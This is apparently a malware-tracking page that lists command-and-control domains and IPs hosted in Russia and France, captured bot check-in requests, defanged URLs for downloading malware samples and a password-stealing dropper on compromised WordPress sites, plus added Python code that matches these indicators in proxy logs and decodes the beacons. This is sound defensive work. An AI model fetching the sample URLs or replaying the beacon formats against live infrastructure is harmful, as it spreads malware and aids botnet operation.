
pltd.myjino.ru(HTTP Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Domain Name : pltd.myjino.ru
IP : 81.177.140.144
HTTP Requests : hxxp://pltd.myjino.ru/finsess.php
Data :
POST /finsess.php HTTP/1.0
Host: pltd.myjino.ru
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

1=1882869218&2=&3=&99=15&^
Get sample here : hxxp://93.95.99.172/0310_crypted.exe
Hosting infos : http://whois.domaintools.com/81.177.140.144

righromonhen.ru(HTTP Trojan Password Stealer Hosted In Russian Federation Miragroup Ltd.)

righromonhen.ru 93.171.202.172
www.peak-exposure.co.uk 174.136.12.119
www.depalmaelocatelli.it 62.149.140.139
HTTP Requests :
hxxp://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe
hxxp://righromonhen.ru/gate.php
hxxp://www.depalmaelocatelli.it/wp-content/plugins/cached_data/k1.exe
The two www.* hosts are WordPress sites serving the same k1.exe from the same /wp-content/plugins/cached_data/ directory (apparently compromised); the sample's own request goes to gate.php on righromonhen.ru.
Hosting Infos : http://whois.domaintools.com/93.171.202.172
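To turn the righromonhen.ru indicators above into something a responder can run over a proxy log, here is an added example (editor's code, not from the page) that matches each listed host, IP and path, and additionally flags any other host serving from /wp-content/plugins/cached_data/, on the assumption that a directory which turned up on two unrelated WordPress sites with the same dropper is unlikely to be a legitimate plugin. The log format and log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Indicators from the righromonhen.ru listing.
IOC_HOSTS = {
    "righromonhen.ru", "93.171.202.172",
    "www.peak-exposure.co.uk", "174.136.12.119",
    "www.depalmaelocatelli.it", "62.149.140.139",
}
IOC_PATHS = {"/gate.php", "/wp-content/plugins/cached_data/k1.exe"}

# Weaker, host-independent indicator: the dropper directory seen on both
# compromised WordPress sites (assumption: no legitimate plugin lives here).
DROPPER_DIR = re.compile(r"^/wp-content/plugins/cached_data/")

# Constructed proxy log: "timestamp client method url status".
SAMPLE_LOG = """\
2011-10-03T10:01:12 10.0.0.15 GET http://www.peak-exposure.co.uk/wp-content/plugins/cached_data/k1.exe 200
2011-10-03T10:01:20 10.0.0.15 POST http://righromonhen.ru/gate.php 200
2011-10-03T10:02:03 10.0.0.22 GET http://www.example.com/wp-content/plugins/akismet/akismet.js 200
2011-10-03T10:03:41 10.0.0.31 GET http://blog.example.org/wp-content/plugins/cached_data/k2.exe 200
2011-10-03T10:04:09 10.0.0.15 GET http://93.171.202.172/gate.php 200
"""


def match_line(line):
    """Return the list of indicator matches for one log line ([] if clean)."""
    parts = line.split()
    if len(parts) < 4:
        return []
    url = urlsplit(parts[3])
    host = url.hostname or ""
    reasons = []
    if host in IOC_HOSTS:
        reasons.append("host:" + host)
    if url.path in IOC_PATHS:
        reasons.append("path:" + url.path)
    elif DROPPER_DIR.match(url.path):
        # Same dropper directory on a host not yet on the list.
        reasons.append("dropper-dir:" + url.path)
    return reasons


def scan_log(text):
    """Run match_line over every line; return (client, url, reasons) hits."""
    hits = []
    for line in text.splitlines():
        reasons = match_line(line)
        if reasons:
            parts = line.split()
            hits.append((parts[1], parts[3], reasons))
    return hits


def infected_clients(text):
    """Distinct client addresses that touched any indicator."""
    return {client for client, _, _ in scan_log(text)}


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, url, ", ".join(reasons))
    print("clients to triage:", sorted(infected_clients(SAMPLE_LOG)))
```

The directory-only match is deliberately reported under its own label so an analyst can weigh it separately from the exact indicators; a hit on it means a host not yet on the list and worth adding.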

damcodes777.cc(HTTP Malware Hosted In Russian Federation Moscow Fast Serv Inc.)

damcodes777.cc 86.105.227.124
URL : hxxp://damcodes777.cc/b/connect/2
DATA :
POST /b/connect/2 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)
Host: damcodes777.cc
Content-Length: 51
Cache-Control: no-cache

cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0
(cs=aW5zZXJ0 is base64 for "insert"; p carries the OS string, m a numeric bot identifier and v a version, so this is a registration check-in.)
Hosting Infos : http://whois.domaintools.com/86.105.227.124
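The two POST beacons on this page (pltd.myjino.ru /finsess.php above and damcodes777.cc /b/connect/2 here) are both short form-encoded check-ins. The following added example (editor's code, not from the page) parses such a captured request, checks that the declared Content-Length matches the body that was actually captured, splits the form fields, flags any host/path pair that is on the page's list, and base64-decodes fields that are well-formed base64 yielding printable text, which is how the cs=aW5zZXJ0 field gives "insert". The request strings are reconstructed from the captures with assumed CRLF line endings.

```python
import base64
import binascii
from urllib.parse import parse_qsl

# Reconstructed copies of the two captured beacons (CRLF endings assumed).
FINSESS_BEACON = (
    "POST /finsess.php HTTP/1.0\r\n"
    "Host: pltd.myjino.ru\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "1=1882869218&2=&3=&99=15&^"
)
CONNECT_BEACON = (
    "POST /b/connect/2 HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0)\r\n"
    "Host: damcodes777.cc\r\n"
    "Content-Length: 51\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0"
)

# (host, path) pairs taken from the listings on this page.
KNOWN_C2 = {
    ("pltd.myjino.ru", "/finsess.php"),
    ("damcodes777.cc", "/b/connect/2"),
}


def parse_request(raw):
    """Split a raw HTTP request into method, path, headers and body.

    Header names are lower-cased.  length_ok records whether the declared
    Content-Length matches the captured body; a mismatch usually means a
    truncated capture, so the body fields should not be trusted.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    declared = headers.get("content-length")
    length_ok = declared is None or int(declared) == len(body.encode("latin-1"))
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body, "length_ok": length_ok}


def decode_base64_text(value):
    """Base64-decode value if it is well-formed and yields printable ASCII;
    otherwise return None.  Short or unpadded values are rejected up front
    so plain numbers like 3107216218 are not mistaken for base64."""
    if len(value) < 4 or len(value) % 4:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if text.isprintable() else None


def analyze_beacon(raw):
    """Report what a responder needs from a form-encoded POST beacon: host
    and path, whether they are a listed C2, every body field, and the
    fields whose values hide a base64-wrapped string."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    fields = dict(parse_qsl(req["body"], keep_blank_values=True))
    decoded = {}
    for name, value in fields.items():
        text = decode_base64_text(value)
        if text is not None:
            decoded[name] = text
    return {
        "host": host,
        "path": req["path"],
        "known_c2": (host, req["path"]) in KNOWN_C2,
        "length_ok": req["length_ok"],
        "user_agent": req["headers"].get("user-agent", ""),
        "fields": fields,
        "decoded": decoded,
    }


if __name__ == "__main__":
    for beacon in (FINSESS_BEACON, CONNECT_BEACON):
        print(analyze_beacon(beacon))
```

Both captures pass the length check (26 and 51 bytes), so the bodies shown on the page are complete. The User-Agent strings are also worth keeping: both are static, dated browser strings that can be paired with the host/path match in a proxy rule.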

ptmr1.in(HTTP Botnet Hosted In France Roubaix Ovh Sas)

DNS Requests :
ptmr1.in -> 94.23.104.199
HTTP Command :
GET /~clientes/i/i.php?frevny=fQ90R444P&bf=KC-FC8&qrynl=855555&irefvba=f6557&hcqngvzr=5
Hosting infos: http://whois.domaintools.com/94.23.104.199
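The parameter names in the ptmr1.in check-in are not random: read through ROT13 they become serial, os, delay, version and updatime, and the values shift the same way (frevny=fQ90R444P becomes serial=sD90E444C). The added example below (editor's code, not from the page) decodes the query string and scores how many decoded names are ordinary check-in field names, which separates ROT13-obfuscated beacons from ones using genuinely random tokens. The host is taken from the DNS line, the word list is the editor's own, and the space inside "qryn l" in the original listing is assumed to be an extraction artifact and dropped.

```python
import codecs
from urllib.parse import parse_qsl, urlsplit

# Reconstructed check-in from the listing (host from the DNS line; the
# stray space in "qryn l" assumed to be an extraction artifact).
PTMR1_BEACON = ("http://ptmr1.in/~clientes/i/i.php"
                "?frevny=fQ90R444P&bf=KC-FC8&qrynl=855555&irefvba=f6557&hcqngvzr=5")

# Field names commonly seen in bot check-ins (editor's list, not from the
# page); used only to score whether a ROT13 reading is plausible.
CHECKIN_WORDS = {"serial", "os", "delay", "version", "updatime",
                 "id", "uid", "hwid", "build", "guid"}


def rot13(text):
    """ROT13 is its own inverse: letters shift by 13, digits and
    punctuation pass through unchanged."""
    return codecs.decode(text, "rot_13")


def decode_query(url):
    """Return {rot13(name): rot13(value)} for every query parameter."""
    query = urlsplit(url).query
    return {rot13(k): rot13(v)
            for k, v in parse_qsl(query, keep_blank_values=True)}


def rot13_plausibility(url):
    """Fraction of decoded parameter names that are known check-in words.
    Near 1.0 means the bot hides its field names with ROT13; near 0.0 the
    names are either plain text already or something other than ROT13."""
    names = list(decode_query(url))
    if not names:
        return 0.0
    return sum(name in CHECKIN_WORDS for name in names) / len(names)


if __name__ == "__main__":
    for name, value in decode_query(PTMR1_BEACON).items():
        print(f"{name}={value}")
    print("rot13 plausibility:", rot13_plausibility(PTMR1_BEACON))
```

The delay field (855555) and updatime field (5) are the kind of values a tracker wants to record alongside the IOC, since they describe the bot's polling behaviour and therefore how often the beacon will show up in logs.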